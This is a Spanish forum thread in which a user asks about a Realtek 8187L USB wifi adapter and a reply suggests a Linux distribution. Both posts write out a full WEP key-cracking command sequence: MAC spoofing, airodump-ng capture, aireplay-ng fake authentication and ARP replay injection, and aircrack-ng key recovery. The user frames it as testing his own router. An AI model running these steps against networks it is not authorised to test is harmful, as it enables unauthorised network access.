?>/script>'; } ?> GOLD USB 1000mW + Antena RP-SMA 5dbi + Modo monitor (Chipset Realtek 8187L) Widgets Magazine

Autor Tema: GOLD USB 1000mW + Antena RP-SMA 5dbi + Modo monitor (Chipset Realtek 8187L)  (Leído 3664 veces)

0 Usuarios y 1 Visitante están viendo este tema.

rubensppg

  • Visitante
Hola, soy nuevo en el foro

Me he comprado esta tarjeta GOLD USB 1000mW + Antena RP-SMA 5dbi + Modo monitor (Chipset Realtek 8187L) y quería probar la seguridad de mi router wifi de nuevo, ya que lo hice con la tarjeta  wifi que me trae el portátil  que es: “Intel(R) PRO/Wireless 3945ABG Network Connection  (192.168.1.101)”


Lo que quiero es comprobar la velocidad de esta tarjeta que me acabo de comprar (haber en cuento me saca mi clave wep)  ya que la Intel(R) PRO/Wireless 3945ABG me tardo una hora aproximadamente.

Mis preguntas son:

Qué distribución utilizo para la tarjeta GOLD USB 1000mW wifilax 3.1 o wifiway?

Mi otra pegunta es:

El código que he escrito está bien para la tarjeta GOLD USB 1000mW? (ya que el código escrito es el que utilice con la tarjeta del portátil la Intel(R) PRO/Wireless 3945ABG y use la versión wifilax).


Inicio/Wifislax/Drivers

*Aquí tengo otra duda que no se que driver son los de esta tarjeta “GOLD USB 1000mW + Antena RP-SMA 5dbi + Modo monitor (Chipset Realtek 8187L)” comprada en comprawifi

http://www./usb/alta-potencia/comprawifi-gold-usb-1000mw-antena-rp-sma-5dbi-modo-monitor-chipset-realtek-8187l-/prod_2147.html


-Abrír consola de linux y teclear:

airmon-ng stop wifi0

ifconfig wifi0 down

macchanger --mac 00:11:22:33:44:55 wifi0(ahora esa será nuestra Mac)

airmon-ng start wifi0

ifconfig wifi0 up

iwconfig wifi0 rate 1M

airodump-ng -w(un nombre que quieras) --channel(canal) wifi0

-Abrimos una nueva Shell para empezar a inyectar:(a esto se le llama ataque 3)
aireplay -3 -b(Mac de la conexion que queremos sacar) -h(MacNuestra) wifi0
aireplay -1 0 -a(Mac de la conexión que queremos sacar) -e(nombre de la red,osea el Essid) -h(MacNuestra) wifi0
-Abrimos una shell y tecleamos:

aircrack-ptw (nombre del archivo que pusiste -01.cap)


Muchas Gracias de antemano.

Gracias



sagahades26

  • Visitante
Re: GOLD USB 1000mW + Antena RP-SMA 5dbi + Modo monitor (Chipset Realtek 8187L)
« Respuesta #1 en: 20-02-2010, 12:17 (Sábado) »
hola yo te recomiendo el wifiway 1.0 final ,para mi es mas completo. Aqi te paso un enlace con los ultimos driver de tu tarjeta tienes qe mirar qe los tuyos son 8187L  : http://www.realtek.com.tw/downloads/downloadsView.aspx?Langid=1&PNid=1&PFid=1&Level=6&Conn=5&DownTypeID=3&GetDown=false&Downloads=true#RTL8187L. Yo lo hago asi          iwconfig wifi0 mode monitor

airmon-ng start wifi0

yo casi nunca le cambio la MAC  ,le dejo la qe trae ,solo en raras ocasiones la cambio.

iwconfig wifi0 rate 1M

airodump-ng wifi0 ,cuando tenemos el ap a elegir .paramos .

airodump-ng --bssid 00:11:22:33:44:55 -c CANAL -w datos wifi0             -Abrimos una nueva Shell para empezar a inyectar en la caso qe tengamos cliente asociado,si no hay lo qe veo es tu caso
aireplay-ng -1 0 -e essid -a mac ap -h mac nuestra . esto para estar asociados y luego
aireplay-ng -3 -x 600 -b mac ap -h mac nuestra ,si todo va bien cuando tengas 60000 datas o lo qe hagan falta segun tu caso : aircrack-ng datos-01.cap .